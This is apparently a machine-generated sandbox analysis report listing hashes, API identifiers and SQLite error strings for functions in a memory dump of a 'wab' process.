                                                        • Opcode Fuzzy Hash: 7e99c38947348f29deb970c8d4f86c0cf47aea4b8a62585419e45528a1df2170
                                                        • Instruction Fuzzy Hash: 6171CD716003129BD711CF28CCC0A96B7A6AF95B64F0A466DEA5C9F341D731ED11CBE1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: ,N!$out of memory
                                                        • API String ID: 2102423945-2963719674
                                                        • Opcode ID: 1e11d33654bdcfa75bd243f624ace3eb1e8bc5bb36248e4954cd0c75f9af48c3
                                                        • Instruction ID: e95a0e8ec49cf5fcd113dfcba6433f94139fd1595a99b3ce11fec9754487b653
                                                        • Opcode Fuzzy Hash: 1e11d33654bdcfa75bd243f624ace3eb1e8bc5bb36248e4954cd0c75f9af48c3
                                                        • Instruction Fuzzy Hash: AC81B278A0060A9FD715CF28D480AAABBB1FF46714F14C5ADD84D9B362D730EB42CB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: f715cfeb196eaf2c6c43683c07bb5dd707615a30184a127dc7d73cc012485574
                                                        • Instruction ID: 147f2958bfa1fdfcecf00511fab3f8bee2511f988b501517d78bff2ae8d5e5e1
                                                        • Opcode Fuzzy Hash: f715cfeb196eaf2c6c43683c07bb5dd707615a30184a127dc7d73cc012485574
                                                        • Instruction Fuzzy Hash: 27616C216047924AC32ACF3D88E44B5BFE19F9111EB8985EDE9DE8F383D136D645C7A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: ,N!
                                                        • API String ID: 2102423945-3240916410
                                                        • Opcode ID: 66cc73af4f0531743cf0c042a8ea7d7952c67f8fa4a15636727da8111172f2e0
                                                        • Instruction ID: 27059262a19ed2db5cab5beb7bcd38c0a77d3629cf90c4ac95a0c0ab0a36f7df
                                                        • Opcode Fuzzy Hash: 66cc73af4f0531743cf0c042a8ea7d7952c67f8fa4a15636727da8111172f2e0
                                                        • Instruction Fuzzy Hash: C351C5717003068BD714CE69D8806BAB7E9FB89725F40893DE95EC7341EB34E915C791
                                                        APIs
                                                        • _memset.LIBCMT ref: 21483396
                                                          • Part of subcall function 2147D4E0: _memset.LIBCMT ref: 2147D514
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: 39210becb893b1b0be65e7a2f60b43c5f14fe33d337d5fbbe2e45a5f613abb21
                                                        • Instruction ID: 9765df19792c1f1484a54b3bcdb842d3d1a2627a7c2b1e5e96432d015924dc4b
                                                        • Opcode Fuzzy Hash: 39210becb893b1b0be65e7a2f60b43c5f14fe33d337d5fbbe2e45a5f613abb21
                                                        • Instruction Fuzzy Hash: 78510571A042019BD3118F29CC44B57B7E2AF95728F26856DE85C8B382DB71E907CB91
                                                        APIs
                                                        Strings
                                                        • database corruption at line %d of [%.10s], xrefs: 214866C4
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 214866BA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: e37a8e74152738906a709aa3bb8988c3c47840ea85ebf04a35fd457340bf6492
                                                        • Instruction ID: cab54281e876184a311de35c711485abec0510cf1d837a213934b0572a100f44
                                                        • Opcode Fuzzy Hash: e37a8e74152738906a709aa3bb8988c3c47840ea85ebf04a35fd457340bf6492
                                                        • Instruction Fuzzy Hash: 1D51EF70A043518FD351EF28C840B06BBE5AF91768F1A896DEC5C9B342E771E946CBD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 0-1231421067
                                                        • Opcode ID: fb377ff8eaed01e06290bffced70bec3ae2a2dfe5dea58a8d4b05fd2f1bf511b
                                                        • Instruction ID: 31250d8f22102b5f041b7d0312dcb1063c1b6e4570eb1bf6ecab4026e1467ab5
                                                        • Opcode Fuzzy Hash: fb377ff8eaed01e06290bffced70bec3ae2a2dfe5dea58a8d4b05fd2f1bf511b
                                                        • Instruction Fuzzy Hash: 8D51C171B002019BE711CF28CC84B5677A5EB61B64F6A466DE92C9F382D731E841CBD1
                                                        APIs
                                                        Strings
                                                        • misuse at line %d of [%.10s], xrefs: 214C9377
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 214C936D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$misuse at line %d of [%.10s]
                                                        • API String ID: 2102423945-1850456636
                                                        • Opcode ID: bc885233fe9237f168ec9c35fa76903c40f6693740c611d62a42f468b9e8a227
                                                        • Instruction ID: 47956c11b03a912b060e82bcd6f1560a26eb8b6ce22c75cfa58ff1d2d0ae56ec
                                                        • Opcode Fuzzy Hash: bc885233fe9237f168ec9c35fa76903c40f6693740c611d62a42f468b9e8a227
                                                        • Instruction Fuzzy Hash: CA41F274A00A05ABE7018F28D885F9AF7A8FF55B19F04426DE91CCB382D735AA11C7D5
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: a99f173afa3abb0c5c6cc565bc18f292746f60373d32464451216abdc559827c
                                                        • Instruction ID: d19b8d725c4bae6737874df04170b35d5a7c5b0fd235ca4a87d85e45f101a260
                                                        • Opcode Fuzzy Hash: a99f173afa3abb0c5c6cc565bc18f292746f60373d32464451216abdc559827c
                                                        • Instruction Fuzzy Hash: 9651E3B1E002159BDB04CF99CC80ABEBBB0EF54715F5441ADE81DAB381D735DA10CBA1
                                                        APIs
                                                        Strings
                                                        • database corruption at line %d of [%.10s], xrefs: 2147F699
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 2147F68F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: 0858c1f42feea82b845a2d394ca9bbcf23ba876ea4ec9123ed0c003a5a0dcc8b
                                                        • Instruction ID: 1ca95695709a127948d151d1b1305957a1e9c4d91953b3689d7f393b16039861
                                                        • Opcode Fuzzy Hash: 0858c1f42feea82b845a2d394ca9bbcf23ba876ea4ec9123ed0c003a5a0dcc8b
                                                        • Instruction Fuzzy Hash: E741D3756043408FD3128F388880B867BF2AF96364F244AADE8AC8F343D675DA47C791
                                                        APIs
                                                        Strings
                                                        • string or blob too big, xrefs: 21495E43
                                                        • statement aborts at %d: [%s] %s, xrefs: 21495E7B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: statement aborts at %d: [%s] %s$string or blob too big
                                                        • API String ID: 2102423945-977909764
                                                        • Opcode ID: 181486ccf41b67858e9fb8a289ed32e49004df18d726b6c044e07c695e52d3f0
                                                        • Instruction ID: b0dd256351caa8263bf8893c0db5cc23ce16debb0ac3d17ebced12eeb4cc2566
                                                        • Opcode Fuzzy Hash: 181486ccf41b67858e9fb8a289ed32e49004df18d726b6c044e07c695e52d3f0
                                                        • Instruction Fuzzy Hash: 3751F574A0026A8FEB20CB64CC90F9AB7B5BF55314F1485EAD50DAB341E731AE85CF61
                                                        APIs
                                                        Strings
                                                        • Expression tree is too large (maximum depth %d), xrefs: 214D1893
                                                        • index, xrefs: 214D18D1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: Expression tree is too large (maximum depth %d)$index
                                                        • API String ID: 2102423945-293986305
                                                        • Opcode ID: 048318026bad8dc6bff13675a80d2d4503b474364ee4e37c1152a9e12f84774f
                                                        • Instruction ID: e212903b55794b3623810d2fc7b9726c5e4c23032ef3d8cf9922ff4482b25a2e
                                                        • Opcode Fuzzy Hash: 048318026bad8dc6bff13675a80d2d4503b474364ee4e37c1152a9e12f84774f
                                                        • Instruction Fuzzy Hash: DD41F335A006119FCB15CF68D490A6E7BB1EFA9B10F0441ADED4D6B386D734EA11CBD1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: out of memory$unknown database %s
                                                        • API String ID: 2102423945-3235021497
                                                        • Opcode ID: 862da1a89aa950a2a0984c8d924f5625ed7d2996de4e8b40b9f1c5352d421ca4
                                                        • Instruction ID: 35447ee67bdbebe0c91b69a504b5b584d6b0fdacb67417646864157c8ce1eab1
                                                        • Opcode Fuzzy Hash: 862da1a89aa950a2a0984c8d924f5625ed7d2996de4e8b40b9f1c5352d421ca4
                                                        • Instruction Fuzzy Hash: 3B21D436B001086BE7019A6DFC85DAA77ADDFA5B29F040169FD0CCB302E937DE1182E1
                                                        APIs
                                                        Strings
                                                        • database corruption at line %d of [%.10s], xrefs: 21480838
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 2148082E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: 50206f022f745693e423837a84edb298d3cd0305d1376fa4803e71f375dc4f3b
                                                        • Instruction ID: 0a136df3fd2a36e02efce2036cbce6f23ab9c5b320fc45e88472e6edfd211631
                                                        • Opcode Fuzzy Hash: 50206f022f745693e423837a84edb298d3cd0305d1376fa4803e71f375dc4f3b
                                                        • Instruction Fuzzy Hash: 4721F972F102065BE7109E6CDC41AE9B7B9DF91724F15827DD94CAF381E735EA428780
                                                        APIs
                                                        Strings
                                                        • database corruption at line %d of [%.10s], xrefs: 2148382B
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 21483821
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 2102423945-1231421067
                                                        • Opcode ID: d5913a0ea9f1918daf43d1f6c9f2cc37ea4625d58963e6e4420d49d7e29dca2d
                                                        • Instruction ID: 50b387f6829a84f1e904c09aa4fcaa99afb936487f2cdb9e8ed838e5f7b3a6e1
                                                        • Opcode Fuzzy Hash: d5913a0ea9f1918daf43d1f6c9f2cc37ea4625d58963e6e4420d49d7e29dca2d
                                                        • Instruction Fuzzy Hash: F821E270E042469FCB14CFA8CC80AAEBBF1EF64705F1481ADD81DAB381D634EA00CB61